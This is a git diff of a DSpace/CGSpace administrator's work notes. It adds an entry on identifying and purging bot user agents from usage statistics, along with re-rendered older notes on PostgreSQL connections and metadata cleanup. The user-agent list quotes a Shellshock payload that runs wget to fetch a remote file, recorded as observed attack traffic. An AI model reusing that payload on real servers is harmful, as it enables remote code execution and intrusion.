diff --git a/content/posts/2022-03.md b/content/posts/2022-03.md
index 74c121c0a..eca29392a 100644
--- a/content/posts/2022-03.md
+++ b/content/posts/2022-03.md
@@ -18,4 +18,56 @@ $ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv >
+## 2022-03-04
+
+- Looking over the CGSpace Solr statistics from 2022-02
+  - I see a few new bots, though once I expanded my search for user agents with "www" in the name I found so many more!
+  - Here are some of the more prevalent or weird ones:
+    - axios/0.21.1
+    - Mozilla/5.0 (compatible; Faveeo/1.0; +http://www.faveeo.com)
+    - Nutraspace/Nutch-1.2 (www.nutraspace.com)
+    - Mozilla/5.0 Moreover/5.1 (+http://www.moreover.com; webmaster@moreover.com)
+    - Mozilla/5.0 (compatible; Exploratodo/1.0; +http://www.exploratodo.com
+    - Mozilla/5.0 (compatible; GroupHigh/1.0; +http://www.grouphigh.com/)
+    - Crowsnest/0.5 (+http://www.crowsnest.tv/)
+    - Mozilla/5.0/Firefox/42.0 - nbertaupete95(at)gmail.com
+    - metha/0.2.27
+    - ZaloPC-win32-24v454
+    - Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:x.x.x) Gecko/20041107 Firefox/x.x
+    - ZoteroTranslationServer/WMF (mailto:noc@wikimedia.org)
+    - FullStoryBot/1.0 (+https://www.fullstory.com)
+    - Link Validity Check From: http://www.usgs.gov
+    - OSPScraper (+https://www.opensyllabusproject.org)
+    - () { :;}; /bin/bash -c \"wget -O /tmp/bbb www.redel.net.br/1.php?id=3137382e37392e3138372e313832\"
+  - I submitted [a pull request to COUNTER-Robots](https://github.com/atmire/COUNTER-Robots/pull/52) with some of these
+- I purged a bunch of hits from the stats using the `check-spider-hits.sh` script:
+
+```console
+]$ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri -p
+Purging 6 hits from scalaj-http in statistics
+Purging 5 hits from lua-resty-http in statistics
+Purging 9 hits from AHC in statistics
+Purging 7 hits from acebookexternalhit in statistics
+Purging 1011 hits from axios\/[0-9] in statistics
+Purging 2216 hits from Faveeo\/[0-9] in statistics
+Purging 1164 hits from Moreover\/[0-9] in statistics
+Purging 740 hits from Exploratodo\/[0-9] in statistics
+Purging 585 hits from GroupHigh\/[0-9] in statistics
+Purging 438 hits from Crowsnest\/[0-9] in statistics
+Purging 1326 hits from nbertaupete95 in statistics
+Purging 182 hits from metha\/[0-9] in statistics
+Purging 68 hits from ZaloPC-win32-24v454 in statistics
+Purging 1644 hits from Firefox\/x\.x in statistics
+Purging 678 hits from ZoteroTranslationServer in statistics
+Purging 27 hits from FullStoryBot in statistics
+Purging 26 hits from Link Validity Check in statistics
+Purging 26 hits from OSPScraper in statistics
+Purging 1 hits from 3137382e37392e3138372e313832 in statistics
+Purging 2755 hits from Nutch-[0-9] in statistics
+
+Total number of bot hits purged: 12914
+```
+
+- I added a few from that list to the local overrides in our DSpace while I wait for feedback from the COUNTER-Robots project
+
diff --git a/docs/2015-11/index.html b/docs/2015-11/index.html
index 0b48d1474..a0dba88bb 100644
--- a/docs/2015-11/index.html
+++ b/docs/2015-11/index.html
@@ -34,7 +34,7 @@ Last week I had increased the limit from 30 to 60, which seemed to help, but now
 $ psql -c 'SELECT * from pg_stat_activity;' | grep idle | grep -c cgspace
 78
 "/>
-
+
@@ -126,7 +126,7 @@ $ psql -c 'SELECT * from pg_stat_activity;' | grep idle | grep -c cgspac
  • Looks like DSpace exhausted its PostgreSQL connection pool
  • Last week I had increased the limit from 30 to 60, which seemed to help, but now there are many more idle connections:
  • -
    $ psql -c 'SELECT * from pg_stat_activity;' | grep idle | grep -c cgspace
    +
    $ psql -c 'SELECT * from pg_stat_activity;' | grep idle | grep -c cgspace
     78
     
    -
    $ psql -c 'SELECT * from pg_stat_activity;' | grep idle | grep -c cgspace
    +
    $ psql -c 'SELECT * from pg_stat_activity;' | grep idle | grep -c cgspace
     96
     
    • For some reason the number of idle connections is very high since we upgraded to DSpace 5
    • @@ -167,12 +167,12 @@ location ~ /(themes|static|aspects/ReportingSuite) {
    • Need to check /about on CGSpace, as it’s blank on my local test server and we might need to add something there
    • CGSpace has been up and down all day due to PostgreSQL idle connections (current DSpace pool is 90):
    -
    $ psql -c 'SELECT * from pg_stat_activity;' | grep idle | grep -c cgspace
    +
    $ psql -c 'SELECT * from pg_stat_activity;' | grep idle | grep -c cgspace
     93
     
    • I looked closer at the idle connections and saw that many have been idle for hours (current time on server is 2015-11-25T20:20:42+0000):
    -
    $ psql -c 'SELECT * from pg_stat_activity;' | less -S
    +
    $ psql -c 'SELECT * from pg_stat_activity;' | less -S
     datid | datname  |  pid  | usesysid | usename  | application_name | client_addr | client_hostname | client_port |         backend_start         |          xact_start           |
     -------+----------+-------+----------+----------+------------------+-------------+-----------------+-------------+-------------------------------+-------------------------------+---
     20951 | cgspace  | 10966 |    18205 | cgspace  |                  | 127.0.0.1   |                 |       37731 | 2015-11-25 13:13:02.837624+00 |                               | 20
    @@ -197,7 +197,7 @@ datid | datname  |  pid  | usesysid | usename  | application_name | client_addr
     
  • Monitoring e-mailed in the evening to say CGSpace was down
  • Idle connections in PostgreSQL again:
  • -
    $ psql -c 'SELECT * from pg_stat_activity;' | grep cgspace | grep -c idle
    +
    $ psql -c 'SELECT * from pg_stat_activity;' | grep cgspace | grep -c idle
     66
     
    • At the time, the current DSpace pool size was 50…
    • @@ -215,7 +215,7 @@ db.statementpool = true
    • And idle connections:
    -
    $ psql -c 'SELECT * from pg_stat_activity;' | grep cgspace | grep -c idle
    +
    $ psql -c 'SELECT * from pg_stat_activity;' | grep cgspace | grep -c idle
     49
     
    • Perhaps I need to start drastically increasing the connection limits—like to 300—to see if DSpace’s thirst can ever be quenched
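The `grep idle | grep -c cgspace` pipeline used throughout these notes can be sketched in Python. This is only a minimal sketch: the sample rows are hypothetical and heavily trimmed, and `count_idle` and `count_by_state` are illustrative helpers, not part of DSpace or PostgreSQL. It also makes one detail visible: matching the substring `idle` counts sessions in the `idle in transaction` state as well, which may matter when deciding whether the pool is leaking connections.

```python
def count_idle(rows, database):
    """Count rows that mention both the database and "idle", like the grep pipeline."""
    return sum(1 for row in rows if database in row and "idle" in row)


def count_by_state(rows, database):
    """Separate plain idle sessions from those that are idle inside a transaction."""
    counts = {"idle": 0, "idle in transaction": 0}
    for row in rows:
        # psql prints columns separated by "|", padded with spaces
        fields = [field.strip() for field in row.split("|")]
        if database not in fields:
            continue
        for state in counts:
            if state in fields:
                counts[state] += 1
    return counts


# Hypothetical rows reduced to: datname | pid | state
sample = [
    "cgspace  | 10966 | idle",
    "cgspace  | 10967 | idle in transaction",
    "cgspace  | 10968 | active",
    "postgres | 11001 | idle",
]

print(count_idle(sample, "cgspace"))
print(count_by_state(sample, "cgspace"))
```

On the sample rows the first function counts two sessions, while the second shows that only one of them is plainly idle.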
    diff --git a/docs/2015-12/index.html b/docs/2015-12/index.html
    index c1bbaed7e..4c9853f03 100644
    --- a/docs/2015-12/index.html
    +++ b/docs/2015-12/index.html
    @@ -36,7 +36,7 @@ Replace lzop with xz in log compression cron jobs on DSpace Test—it uses less
     -rw-rw-r-- 1 tomcat7 tomcat7 387K Nov 18 23:59 dspace.log.2015-11-18.lzo
     -rw-rw-r-- 1 tomcat7 tomcat7 169K Nov 18 23:59 dspace.log.2015-11-18.xz
     "/>
    -
    +
    @@ -137,7 +137,7 @@ Replace lzop with xz in log compression cron jobs on DSpace Test—it uses less
    • CGSpace went down again (due to PostgreSQL idle connections of course)
    • Current database settings for DSpace are db.maxconnections = 30 and db.maxidle = 8, yet idle connections are exceeding this:
    -
    $ psql -c 'SELECT * from pg_stat_activity;' | grep cgspace | grep -c idle
    +
    $ psql -c 'SELECT * from pg_stat_activity;' | grep cgspace | grep -c idle
     39
     
    • I restarted PostgreSQL and Tomcat and it’s back
    • @@ -189,7 +189,7 @@ $ curl -o /dev/null -s -w %{time_total}\\n https://cgspace.cgiar.org/rest/handle
    • CGSpace is very slow, and monitoring is emailing me to say it’s down, even though I can load the page (very slowly)
    • Idle postgres connections look like this (with no change in DSpace db settings lately):
    -
    $ psql -c 'SELECT * from pg_stat_activity;' | grep cgspace | grep -c idle
    +
    $ psql -c 'SELECT * from pg_stat_activity;' | grep cgspace | grep -c idle
     29
     
    • I restarted Tomcat and postgres…
    • @@ -214,7 +214,7 @@ $ curl -o /dev/null -s -w %{time_total}\\n https://cgspace.cgiar.org/rest/handle
    • CGSpace has been up and down all day and REST API is completely unresponsive
    • PostgreSQL idle connections are currently:
    -
    postgres@linode01:~$ psql -c 'SELECT * from pg_stat_activity;' | grep cgspace | grep -c idle
    +
    postgres@linode01:~$ psql -c 'SELECT * from pg_stat_activity;' | grep cgspace | grep -c idle
     28
     
    • I have reverted all the pgtune tweaks from the other day, as they didn’t fix the stability issues, so I’d rather not have them introducing more variables into the equation
    diff --git a/docs/2016-01/index.html b/docs/2016-01/index.html
    index 5dc10cc9b..f84804af9 100644
    --- a/docs/2016-01/index.html
    +++ b/docs/2016-01/index.html
    @@ -28,7 +28,7 @@ Move ILRI collection 10568/12503 from 10568/27869 to 10568/27629 using the move_
     I realized it is only necessary to clear the Cocoon cache after moving collections—rather than reindexing—as no metadata has changed, and therefore no search or browse indexes need to be updated.
     Update GitHub wiki for documentation of maintenance tasks.
     "/>
    -
    +
    @@ -135,7 +135,7 @@ Update GitHub wiki for documentation of maintenance tasks.
    • Tweak date-based facets to show more values in drill-down ranges (#162)
    • Need to remember to clear the Cocoon cache after deployment or else you don’t see the new ranges immediately
    • Set up recipe on IFTTT to tweet new items from the CGSpace Atom feed to my twitter account
    • -
    • Altmetrics' support for Handles is kinda weak, so they can’t associate our items with DOIs until they are tweeted or blogged, etc first.
    • +
    • Altmetrics’ support for Handles is kinda weak, so they can’t associate our items with DOIs until they are tweeted or blogged, etc first.

    2016-01-21

      diff --git a/docs/2016-02/index.html b/docs/2016-02/index.html
      index e9eb2e083..88805586e 100644
      --- a/docs/2016-02/index.html
      +++ b/docs/2016-02/index.html
      @@ -38,7 +38,7 @@ I noticed we have a very interesting list of countries on CGSpace:
       Not only are there 49,000 countries, we have some blanks (25)…
       Also, lots of things like “COTE D`LVOIRE” and “COTE D IVOIRE”
       "/>
      -
      +
      @@ -145,15 +145,15 @@ Also, lots of things like “COTE D`LVOIRE” and “COTE D IVOIRE&r
    • In this case our country field is 78
    • Now find all resources with type 2 (item) that have null/empty values for that field:
    -
    dspacetest=# select resource_id from metadatavalue where resource_type_id=2 and metadata_field_id=78 and (text_value='' OR text_value IS NULL);
    +
    dspacetest=# select resource_id from metadatavalue where resource_type_id=2 and metadata_field_id=78 and (text_value='' OR text_value IS NULL);
     
    • Then you can find the handle that owns it from its resource_id:
    -
    dspacetest=# select handle from item, handle where handle.resource_id = item.item_id AND item.item_id = '22678';
    +
    dspacetest=# select handle from item, handle where handle.resource_id = item.item_id AND item.item_id = '22678';
     
    • It’s 25 items so editing in the web UI is annoying, let’s try SQL!
    -
    dspacetest=# delete from metadatavalue where metadata_field_id=78 and text_value='';
    +
    dspacetest=# delete from metadatavalue where metadata_field_id=78 and text_value='';
     DELETE 25
     
    • After that perhaps a regular dspace index-discovery (no -b) should suffice…
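The select-then-delete workflow above can be rehearsed safely before touching the real database. The following is a minimal sketch under stated assumptions: it uses an in-memory SQLite table as a stand-in for DSpace's PostgreSQL `metadatavalue` table, with made-up rows and only the columns the queries mention. It also handles one detail explicitly: the `SELECT` in the notes matches both empty strings and `NULL`, while the `DELETE` matches only empty strings, so the sketch reuses a single predicate for both.

```python
import sqlite3

# In-memory stand-in for the metadatavalue table (assumption: only these columns)
conn = sqlite3.connect(":memory:")
conn.execute(
    "CREATE TABLE metadatavalue ("
    "resource_id INTEGER, resource_type_id INTEGER, "
    "metadata_field_id INTEGER, text_value TEXT)"
)
conn.executemany(
    "INSERT INTO metadatavalue VALUES (?, ?, ?, ?)",
    [
        (1, 2, 78, "KENYA"),  # a real country value, must survive
        (2, 2, 78, ""),       # blank country
        (3, 2, 78, None),     # NULL country
        (4, 2, 3, ""),        # blank value in another field, must survive
    ],
)

# One predicate shared by the SELECT and the DELETE so they cannot drift apart
BLANK_COUNTRY = (
    "resource_type_id = 2 AND metadata_field_id = 78 "
    "AND (text_value = '' OR text_value IS NULL)"
)

blank_ids = [
    row[0]
    for row in conn.execute(
        f"SELECT resource_id FROM metadatavalue WHERE {BLANK_COUNTRY} ORDER BY resource_id"
    )
]
print(blank_ids)

with conn:  # commits on success, rolls back on error
    deleted = conn.execute(f"DELETE FROM metadatavalue WHERE {BLANK_COUNTRY}").rowcount
print(deleted)

remaining = conn.execute("SELECT COUNT(*) FROM metadatavalue").fetchone()[0]
print(remaining)
```

Comparing the number of selected rows with the number of deleted rows is a cheap sanity check before running a Discovery re-index.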
    • @@ -198,7 +198,7 @@ $ /opt/brew/Cellar/tomcat/8.0.30/bin/catalina start
    • Add CATALINA_OPTS in /opt/brew/Cellar/tomcat/8.0.30/libexec/bin/setenv.sh, as this script is sourced by the catalina startup script
    • For example:
    -
    CATALINA_OPTS="-Djava.awt.headless=true -Xms2048m -Xmx2048m -XX:MaxPermSize=256m -XX:+UseConcMarkSweepGC -Dfile.encoding=UTF-8"
    +
    CATALINA_OPTS="-Djava.awt.headless=true -Xms2048m -Xmx2048m -XX:MaxPermSize=256m -XX:+UseConcMarkSweepGC -Dfile.encoding=UTF-8"
     
    • After verifying that the site is working, start a full index:
    @@ -253,7 +253,7 @@ Swap: 255 57 198
  • There are 1200 records that have PDFs, and will need to be imported into CGSpace
  • I created a filename column based on the dc.identifier.url column using the following transform:
  • -
    value.split('/')[-1]
    +
    value.split('/')[-1]
     
    • Then I wrote a tool called generate-thumbnails.py to download the PDFs and generate thumbnails for them, for example:
    @@ -278,13 +278,13 @@ Processing 64195.pdf
  • Looking at CIAT’s records again, there are some files linking to PDFs on Slide Share, Embrapa, UEA UK, and Condesan, so I’m not sure if we can use those
  • 265 items have dirty, URL-encoded filenames:
  • -
    $ ls | grep -c -E "%"
    +
    $ ls | grep -c -E "%"
     265
     
    • I suggest that we import ~850 or so of the clean ones first, then do the rest after I can find a clean/reliable way to decode the filenames
    • This python2 snippet seems to work in the CLI, but not so well in OpenRefine:
    -
    $ python -c "import urllib, sys; print urllib.unquote(sys.argv[1])" CIAT_COLOMBIA_000169_T%C3%A9cnicas_para_el_aislamiento_y_cultivo_de_protoplastos_de_yuca.pdf
    +
    $ python -c "import urllib, sys; print urllib.unquote(sys.argv[1])" CIAT_COLOMBIA_000169_T%C3%A9cnicas_para_el_aislamiento_y_cultivo_de_protoplastos_de_yuca.pdf
     CIAT_COLOMBIA_000169_Técnicas_para_el_aislamiento_y_cultivo_de_protoplastos_de_yuca.pdf
     
    • Merge pull requests for submission form theming (#178) and missing center subjects in XMLUI item views (#176)
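The Python 2 one-liner for decoding URL-encoded filenames relies on `urllib.unquote`, which lives in `urllib.parse` in Python 3. A minimal Python 3 sketch of the same decoding step follows; `decode_filename` is a hypothetical helper name, and the sample filename is the one from the notes.

```python
from urllib.parse import unquote


def decode_filename(name):
    """Decode percent-escapes (interpreted as UTF-8 by default) in a filename."""
    return unquote(name)


encoded = (
    "CIAT_COLOMBIA_000169_T%C3%A9cnicas_para_el_aislamiento_"
    "y_cultivo_de_protoplastos_de_yuca.pdf"
)
print(decode_filename(encoded))
```

Names without any percent-escapes pass through unchanged, so the function can be applied to the whole file list rather than only the 265 dirty ones.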
    • @@ -294,7 +294,7 @@ CIAT_COLOMBIA_000169_Técnicas_para_el_aislamiento_y_cultivo_de_protoplastos_de_
      • Turns out OpenRefine has an unescape function!
      -
      value.unescape("url")
      +
      value.unescape("url")
       
      • This turns the URLs into human-readable versions that we can use as proper filenames
      • Run web server and system updates on DSpace Test and reboot
      • @@ -302,7 +302,7 @@ CIAT_COLOMBIA_000169_Técnicas_para_el_aislamiento_y_cultivo_de_protoplastos_de_
      • Then you create a facet for blank values on each column, show the rows that have values for one and not the other, then transform each independently to have the contents of the other, with “||” in between
      • Work on Python script for parsing and downloading PDF records from dc.identifier.url
      • To get filenames from dc.identifier.url, create a new column based on this transform: forEach(value.split('||'), v, v.split('/')[-1]).join('||')
      • -
      • This also works for records that have multiple URLs (separated by “||")
      • +
      • This also works for records that have multiple URLs (separated by “||”)
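For the downloader script, the same filename extraction can be done outside OpenRefine. This is a minimal Python sketch of what the `forEach(...)` transform does; the function name and the example URLs are hypothetical.

```python
def filenames_from_urls(value, separator="||"):
    """Keep the last path segment of each URL in a separator-delimited field."""
    return separator.join(url.split("/")[-1] for url in value.split(separator))


# Hypothetical dc.identifier.url values
single = "http://example.org/docs/report.pdf"
multiple = "http://example.org/docs/report.pdf||http://example.org/annex.pdf"

print(filenames_from_urls(single))
print(filenames_from_urls(multiple))
```

A value with a single URL contains no separator, so it is handled by the same code path as a multi-URL value.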

      2016-02-17

        @@ -325,7 +325,7 @@ CIAT_COLOMBIA_000169_Técnicas_para_el_aislamiento_y_cultivo_de_protoplastos_de_
        • To change Spanish accents to ASCII in OpenRefine:
        -
        value.replace('ó','o').replace('í','i').replace('á','a').replace('é','e').replace('ñ','n')
        +
        value.replace('ó','o').replace('í','i').replace('á','a').replace('é','e').replace('ñ','n')
         
        • But actually, the accents might not be an issue, as I can successfully import files containing Spanish accents on my Mac
        • On closer inspection, I can import files with the following names on Linux (DSpace Test):
        • @@ -353,7 +353,7 @@ Bitstream: tést señora alimentación.pdf
        • Looking at the filenames for the CIAT Reports, some have some really ugly characters, like: ' or , or = or [ or ] or ( or ) or _.pdf or ._ etc
        • It’s tricky to parse those things in some programming languages so I’d rather just get rid of the weird stuff now in OpenRefine:
        -
        value.replace("'",'').replace('_=_','_').replace(',','').replace('[','').replace(']','').replace('(','').replace(')','').replace('_.pdf','.pdf').replace('._','_')
        +
        value.replace("'",'').replace('_=_','_').replace(',','').replace('[','').replace(']','').replace('(','').replace(')','').replace('_.pdf','.pdf').replace('._','_')
         
        • Finally import the 1127 CIAT items into CGSpace: https://cgspace.cgiar.org/handle/10568/35710
        • Re-deploy CGSpace with the Google Scholar fix, but I’m waiting on the Atmire fixes for now, as the branch history is ugly
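The chained `replace` calls used to clean the CIAT filenames translate directly to Python, which may be handy if the cleanup ever has to be repeated outside OpenRefine. This is a minimal sketch: `clean_filename` and the sample names are hypothetical, while the replacement pairs and their order are copied from the GREL expression above.

```python
# Same substitutions, in the same order, as the GREL transform
REPLACEMENTS = [
    ("'", ""),
    ("_=_", "_"),
    (",", ""),
    ("[", ""),
    ("]", ""),
    ("(", ""),
    (")", ""),
    ("_.pdf", ".pdf"),
    ("._", "_"),
]


def clean_filename(name):
    """Apply each literal substitution in turn; order matters for the last two."""
    for old, new in REPLACEMENTS:
        name = name.replace(old, new)
    return name


print(clean_filename("Report_(2015),_[draft]_.pdf"))
print(clean_filename("O'Brien_=_notes._v2.pdf"))
```

Keeping the pairs in a list makes the order explicit, which matters because `_.pdf` must be fixed before the more general `._` rule runs.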
        diff --git a/docs/2016-03/index.html b/docs/2016-03/index.html
        index 3f914d7dc..c731dfece 100644
        --- a/docs/2016-03/index.html
        +++ b/docs/2016-03/index.html
        @@ -28,7 +28,7 @@ Looking at issues with author authorities on CGSpace
         For some reason we still have the index-lucene-update cron job active on CGSpace, but I’m pretty sure we don’t need it as of the latest few versions of Atmire’s Listings and Reports module
         Reinstall my local (Mac OS X) DSpace stack with Tomcat 7, PostgreSQL 9.3, and Java JDK 1.7 to match environment on CGSpace server
         "/>
        -
        +
        @@ -128,7 +128,7 @@ Reinstall my local (Mac OS X) DSpace stack with Tomcat 7, PostgreSQL 9.3, and Ja
        • I identified one commit that causes the issue and let them know
        • Restart DSpace Test, as it seems to have crashed after Sisay tried to import some CSV or zip or something:
        -
        Exception in thread "Lucene Merge Thread #19" org.apache.lucene.index.MergePolicy$MergeException: java.io.IOException: No space left on device
        +
        Exception in thread "Lucene Merge Thread #19" org.apache.lucene.index.MergePolicy$MergeException: java.io.IOException: No space left on device
         

        2016-03-08

        • Add a few new filters to Atmire’s Listings and Reports module (#180)
        • @@ -261,7 +261,7 @@ Reinstall my local (Mac OS X) DSpace stack with Tomcat 7, PostgreSQL 9.3, and Ja
          -
          Can't find method org.dspace.app.xmlui.aspect.administrative.FlowGroupUtils.processSaveGroup(org.dspace.core.Context,number,string,[Ljava.lang.String;,[Ljava.lang.String;,org.apache.cocoon.environment.wrapper.RequestWrapper). (resource://aspects/Administrative/administrative.js#967)
          +
          Can't find method org.dspace.app.xmlui.aspect.administrative.FlowGroupUtils.processSaveGroup(org.dspace.core.Context,number,string,[Ljava.lang.String;,[Ljava.lang.String;,org.apache.cocoon.environment.wrapper.RequestWrapper). (resource://aspects/Administrative/administrative.js#967)
           
          • I can reproduce the same error on DSpace Test and on my Mac
          • Looks to be an issue with the Atmire modules, I’ve submitted a ticket to their tracker.
          diff --git a/docs/2016-04/index.html b/docs/2016-04/index.html
          index 39b956379..5d4cf4f66 100644
          --- a/docs/2016-04/index.html
          +++ b/docs/2016-04/index.html
          @@ -32,7 +32,7 @@ After running DSpace for over five years I’ve never needed to look in any
           This will save us a few gigs of backup space we’re paying for on S3
           Also, I noticed the checker log has some errors we should pay attention to:
           "/>
          -
          +
          @@ -150,7 +150,7 @@ java.io.FileNotFoundException: /home/cgspace.cgiar.org/assetstore/64/29/06/64290
           ******************************************************
          • So this would be the tomcat7 Unix user, who seems to have a default limit of 1024 files in its shell
          • -
          • For what it’s worth, we have been setting the actual Tomcat 7 process' limit to 16384 for a few years (in /etc/default/tomcat7)
          • +
          • For what it’s worth, we have been setting the actual Tomcat 7 process’ limit to 16384 for a few years (in /etc/default/tomcat7)
          • Looks like cron will read limits from /etc/security/limits.* so we can do something for the tomcat7 user there
          • Submit pull request for Tomcat 7 limits in Ansible dspace role (#30)
          @@ -159,10 +159,10 @@ java.io.FileNotFoundException: /home/cgspace.cgiar.org/assetstore/64/29/06/64290
        • Reduce Amazon S3 storage used for logs from 46 GB to 6 GB by deleting a bunch of logs we don’t need!
        # s3cmd ls s3://cgspace.cgiar.org/log/ > /tmp/s3-logs.txt
        -# grep checker.log /tmp/s3-logs.txt | awk '{print $4}' | xargs s3cmd del
        -# grep cocoon.log /tmp/s3-logs.txt | awk '{print $4}' | xargs s3cmd del
        -# grep handle-plugin.log /tmp/s3-logs.txt | awk '{print $4}' | xargs s3cmd del
        -# grep solr.log /tmp/s3-logs.txt | awk '{print $4}' | xargs s3cmd del
        +# grep checker.log /tmp/s3-logs.txt | awk '{print $4}' | xargs s3cmd del
        +# grep cocoon.log /tmp/s3-logs.txt | awk '{print $4}' | xargs s3cmd del
        +# grep handle-plugin.log /tmp/s3-logs.txt | awk '{print $4}' | xargs s3cmd del
        +# grep solr.log /tmp/s3-logs.txt | awk '{print $4}' | xargs s3cmd del
         
        • Also, adjust the cron jobs for backups so they only back up dspace.log and some stats files (.dat)
        • Try to do some metadata field migrations using the Atmire batch UI (dc.Species → cg.species) but it took several hours and even missed a few records
        • @@ -199,13 +199,13 @@ UPDATE 51258
        • Looking at the DOI issue reported by Leroy from CIAT a few weeks ago
        • It seems the dx.doi.org URLs are much more common in our repository!
        -
        dspacetest=# select count(*) from metadatavalue where metadata_field_id=74 and text_value like 'http://dx.doi.org%';
        +
        dspacetest=# select count(*) from metadatavalue where metadata_field_id=74 and text_value like 'http://dx.doi.org%';
          count
         -------
           5638
         (1 row)
         
        -dspacetest=# select count(*) from metadatavalue where metadata_field_id=74 and text_value like 'http://doi.org%';
        +dspacetest=# select count(*) from metadatavalue where metadata_field_id=74 and text_value like 'http://doi.org%';
          count
         -------
              3
        @@ -231,11 +231,11 @@ dspacetest=# select count(*) from metadatavalue where metadata_field_id=74 and t
         
      • I decided to keep the set of subjects that had FMD and RANGELANDS added, as those terms appear to have been added on request, and it might be the newer list
      • I found 226 blank metadatavalues:
      -
      dspacetest# select * from metadatavalue where resource_type_id=2 and text_value='';
      +
      dspacetest# select * from metadatavalue where resource_type_id=2 and text_value='';
       
      • I think we should delete them and do a full re-index:
      -
      dspacetest=# delete from metadatavalue where resource_type_id=2 and text_value='';
      +
      dspacetest=# delete from metadatavalue where resource_type_id=2 and text_value='';
       DELETE 226
       
      • I deleted them on CGSpace but I’ll wait to do the re-index as we’re going to be doing one in a few days for the metadata changes anyways
      @@ -294,7 +294,7 @@ UPDATE metadatavalue SET metadata_field_id=215 WHERE metadata_field_id=106
       UPDATE 3872
       UPDATE metadatavalue SET metadata_field_id=217 WHERE metadata_field_id=108
       UPDATE 46075
      -$ JAVA_OPTS="-Xms512m -Xmx512m -Dfile.encoding=UTF-8" ~/dspace/bin/dspace index-discovery -bf
      +$ JAVA_OPTS="-Xms512m -Xmx512m -Dfile.encoding=UTF-8" ~/dspace/bin/dspace index-discovery -bf
      • CGSpace was down but I’m not sure why, this was in catalina.out:
      @@ -387,7 +387,7 @@ UPDATE 46075
    • Basically, this gives us the ability to use the latest upstream stable 9.3.x release (currently 9.3.12)
    • Looking into the REST API errors again, it looks like these started appearing a few days ago in the tens of thousands:
    -
    $ grep -c "Aborting context in finally statement" dspace.log.2016-04-20
    +
    $ grep -c "Aborting context in finally statement" dspace.log.2016-04-20
     21252
     
    • I found a recent discussion on the DSpace mailing list and I’ve asked for advice there
    • @@ -423,7 +423,7 @@ UPDATE 46075
    • Looks like the last one was “down” from about four hours ago
    • I think there must be something with this REST stuff:
    -
    # grep -c "Aborting context in finally statement" dspace.log.2016-04-*
    +
    # grep -c "Aborting context in finally statement" dspace.log.2016-04-*
     dspace.log.2016-04-01:0
     dspace.log.2016-04-02:0
     dspace.log.2016-04-03:0
    diff --git a/docs/2016-05/index.html b/docs/2016-05/index.html
    index edad6ad1f..330d7e837 100644
    --- a/docs/2016-05/index.html
    +++ b/docs/2016-05/index.html
    @@ -34,7 +34,7 @@ There are 3,000 IPs accessing the REST API in a 24-hour period!
     # awk '{print $1}' /var/log/nginx/rest.log  | uniq | wc -l
     3168
     "/>
    -
    +
     
     
         
    @@ -126,7 +126,7 @@ There are 3,000 IPs accessing the REST API in a 24-hour period!
     
  • I have blocked access to the API now
  • There are 3,000 IPs accessing the REST API in a 24-hour period!
  • -
    # awk '{print $1}' /var/log/nginx/rest.log  | uniq | wc -l
    +
    # awk '{print $1}' /var/log/nginx/rest.log  | uniq | wc -l
     3168
     
    • The two most frequent requesters are in Ethiopia and Colombia: 213.55.99.121 and 181.118.144.29
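One caveat about the count above: `uniq` only collapses adjacent duplicate lines, so without a `sort` in front of it the pipeline counts runs of consecutive requests from the same client rather than distinct IPs, and 3168 may overstate the real number. The following minimal Python sketch shows the difference. The log lines are hypothetical (only the two IP addresses come from the notes), both helper names are illustrative, and blank lines are simply skipped.

```python
def count_unique_clients(lines):
    """Count distinct first fields, like `awk '{print $1}' | sort -u | wc -l`."""
    return len({line.split()[0] for line in lines if line.strip()})


def count_adjacent_runs(lines):
    """Count runs of identical consecutive first fields, like `awk ... | uniq | wc -l`."""
    runs = 0
    previous = None
    for line in lines:
        if not line.strip():
            continue
        client = line.split()[0]
        if client != previous:
            runs += 1
            previous = client
    return runs


# Hypothetical access log lines with interleaved clients
log = [
    "213.55.99.121 - - GET /rest/items",
    "181.118.144.29 - - GET /rest/collections",
    "213.55.99.121 - - GET /rest/items/1",
]

print(count_unique_clients(log))
print(count_adjacent_runs(log))
```

With interleaved requests the run count exceeds the number of distinct clients, which is the situation a busy access log is likely to be in.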
    @@ -166,8 +166,8 @@ LE_RESULT=$?
     $SERVICE_BIN nginx start
    -if [[ "$LE_RESULT" != 0 ]]; then
    -    echo 'Automated renewal failed:'
    +if [[ "$LE_RESULT" != 0 ]]; then
    +    echo 'Automated renewal failed:'
         cat /var/log/letsencrypt/renew.log
    @@ -240,7 +240,7 @@ fi
    • Found ~200 messed up CIAT values in dc.publisher:
    -
    # select text_value from metadatavalue where resource_type_id=2 and metadata_field_id=39 and text_value similar to "%  %";
    +
    # select text_value from metadatavalue where resource_type_id=2 and metadata_field_id=39 and text_value similar to "%  %";
     

    2016-05-13

    • More theorizing about CGcore
    • @@ -259,7 +259,7 @@ fi
    • They have thumbnails on Flickr and elsewhere
    • In OpenRefine I created a new filename column based on the thumbnail column with the following GREL:
    -
    if(cells['thumbnails'].value.contains('hqdefault'), cells['thumbnails'].value.split('/')[-2] + '.jpg', cells['thumbnails'].value.split('/')[-1])
    +
    if(cells['thumbnails'].value.contains('hqdefault'), cells['thumbnails'].value.split('/')[-2] + '.jpg', cells['thumbnails'].value.split('/')[-1])
     
    • Because ~400 records had the same filename on Flickr (hqdefault.jpg) but different UUIDs in the URL
    • So for the hqdefault.jpg ones I just take the UUID (-2) and use it as the filename
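The thumbnail naming rule can also be written in Python for use in a download script. This is a minimal sketch of the same logic as the GREL expression; `thumbnail_filename` and the example URLs are hypothetical.

```python
def thumbnail_filename(url):
    """Name hqdefault thumbnails after their parent path segment, others after the file."""
    parts = url.split("/")
    if "hqdefault" in url:
        # Every such file is called hqdefault.jpg, so use the unique ID before it
        return parts[-2] + ".jpg"
    return parts[-1]


# Hypothetical thumbnail URLs
print(thumbnail_filename("https://example.org/vi/abc123/hqdefault.jpg"))
print(thumbnail_filename("https://example.org/photos/image_01.jpg"))
```

Using the second-to-last path segment keeps the names unique even though every such thumbnail shares the same basename.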
    • @@ -269,7 +269,7 @@ fi
      • More quality control on filename field of CCAFS records to make processing in shell and SAFBuilder more reliable:
      -
      value.replace('_','').replace('-','')
      +
      value.replace('_','').replace('-','')
       
      • We need to hold off on moving dc.Species to cg.species because it is only used for plants, and might be better to move it to something like cg.species.plant
      • And dc.identifier.fund is MOSTLY used for CPWF project identifier but has some other sponsorship things
      @@ -281,17 +281,17 @@ fi
    -
